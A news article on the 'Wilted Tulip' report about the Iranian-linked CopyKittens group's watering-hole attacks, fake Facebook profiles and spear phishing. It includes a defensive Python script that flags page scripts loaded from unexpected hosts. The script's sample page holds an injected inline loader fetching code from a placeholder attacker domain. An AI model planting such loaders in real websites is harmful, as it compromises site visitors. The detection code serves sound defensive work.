New report by Israeli cyber-intelligence firm says CopyKittens lays malware traps, creates fake Facebook pages
An Iranian-linked cyber espionage group called CopyKittens has been targeting governments and institutions globally, including in the US, Israel, Germany, Turkey and Saudi Arabia, security experts say in a new report.
The report, called Wilted Tulip, has been compiled by Israeli cyber security firm ClearSky and multinational Japanese software firm Trend Micro Inc.
It tracks the activities of the group since it was founded in 2013, and says it has targeted victims using self-developed malware and hacking tools that it spreads via emails with links to malicious websites or with malicious attachments.
In March, ClearSky dubbed the group an “Iranian threat agent.”
Facebook profiles have also been used for spreading malicious links and building trust with targets, the report said.
The group has also breached online news outlets and other websites to stage so-called watering hole attacks, in which the attacker guesses or observes which websites the targeted group is most likely to visit and infects those sites with malware, hoping that some members of the target group will eventually be infected.
The objective of CopyKittens, said the report, is to gather as much information and data from target organizations as possible, gaining access to “large amounts of documents, spreadsheets, files containing personal data, configuration files and databases.”
Often, when the attackers “get greedy” and infiltrate multiple computers within a network that is breached, they are discovered.
On March 30, 2017, ClearSky reported a breach of multiple websites, including The Jerusalem Post, Maariv and the IDF Disabled Veterans Organization website.
JavaScript code was inserted into the breached websites, the report said, allowing the attackers to gather information on visitors and to carry out social engineering — for example, prompting users for credentials or asking them to install malware.
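The watering hole technique described above rests on a site quietly serving script the operator never published. One defensive check a site owner can run against their own pages is to compare every script the page loads, whether by `src` attribute or by URL inside an inline block, against an allowlist of expected script origins. The following is an added example written for this article, not code from ClearSky or Trend Micro; the allowlist, the sample page and the `attacker-placeholder.invalid` domains are all constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist: the hosts a site operator expects to serve script on their pages.
EXPECTED_SCRIPT_HOSTS = {"news.example", "cdn.news.example"}

# Constructed sample page: two legitimate scripts, one unexpected external src,
# and one inline block that loads a further script from a placeholder domain.
SAMPLE_PAGE = """<html><head>
<script src="/static/site.js"></script>
<script src="https://cdn.news.example/analytics.js"></script>
<script src="https://stats.attacker-placeholder.invalid/t.js"></script>
<script>
  var s = document.createElement('script');
  s.src = 'https://collector.attacker-placeholder.invalid/fp.js';
  document.head.appendChild(s);
</script>
</head><body><p>story text</p></body></html>"""

# Matches absolute http(s) URLs inside inline script text.
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")


class ScriptCollector(HTMLParser):
    """Collects external script sources and inline script bodies from an HTML page."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of <script src="...">
        self.inline = []        # full text of each inline <script> block
        self._buf = None        # accumulates data for the inline block being read

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def audit_scripts(html, expected_hosts, page_host):
    """Return (finding_type, url) pairs for scripts loaded from hosts outside the allowlist.

    Relative src values are attributed to page_host, since the page's own server serves them.
    """
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname or page_host
        if host not in expected_hosts:
            findings.append(("unexpected-script-src", src))
    for body in parser.inline:
        for url in URL_RE.findall(body):
            host = urlparse(url).hostname
            if host not in expected_hosts:
                findings.append(("inline-script-external-url", url))
    return findings


if __name__ == "__main__":
    for kind, url in audit_scripts(SAMPLE_PAGE, EXPECTED_SCRIPT_HOSTS, "news.example"):
        print(f"{kind}: {url}")
```

Run against a stored copy of each page on a schedule and alert on any new finding; a script origin that was not on the allowlist yesterday is exactly the artefact a watering hole compromise leaves behind. The check is deliberately narrow (it does not evaluate JavaScript, so obfuscated loaders that build URLs at runtime will slip past it), which is why it complements rather than replaces file-integrity monitoring on the web server.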
In 2013, CopyKittens also used several Facebook profiles to spread links to a website impersonating Haaretz news, an Israeli newspaper, the report said.
Fake profiles named Erik Brown and Amanda Morgan posted links to malicious websites and tagged other fake individuals as their cousins.
“While ‘Erik Brown’ has not been publicly active since September 2015, and the two other Israeli profiles have not been publicly active since September 2013, Amanda Morgan is still active to date. She has thousands of friends and 2,630 followers, many of whom are Israeli,” the report detailed.
In another incident detailed in the report, members of the German Bundestag were compromised by watering holes positioned within several legitimate websites that were hacked and linked to harmful third-party sites.
A Turkish diplomatic institution was hacked, the report said, and used as a cover to launch a massive spear phishing campaign, with victims receiving a highly targeted message from a legitimate, known source.
“CopyKittens is very persistent, despite lacking technological sophistication and operational discipline,” ClearSky and Trend Micro said in a statement. “These characteristics, however, cause it to be relatively noisy, making it easy to find, monitor and apply countermeasures relatively quickly.”
“We’ve been tracking CopyKittens for four years and have become very intimate with its operations,” said Boaz Dolev, CEO of ClearSky, in the statement.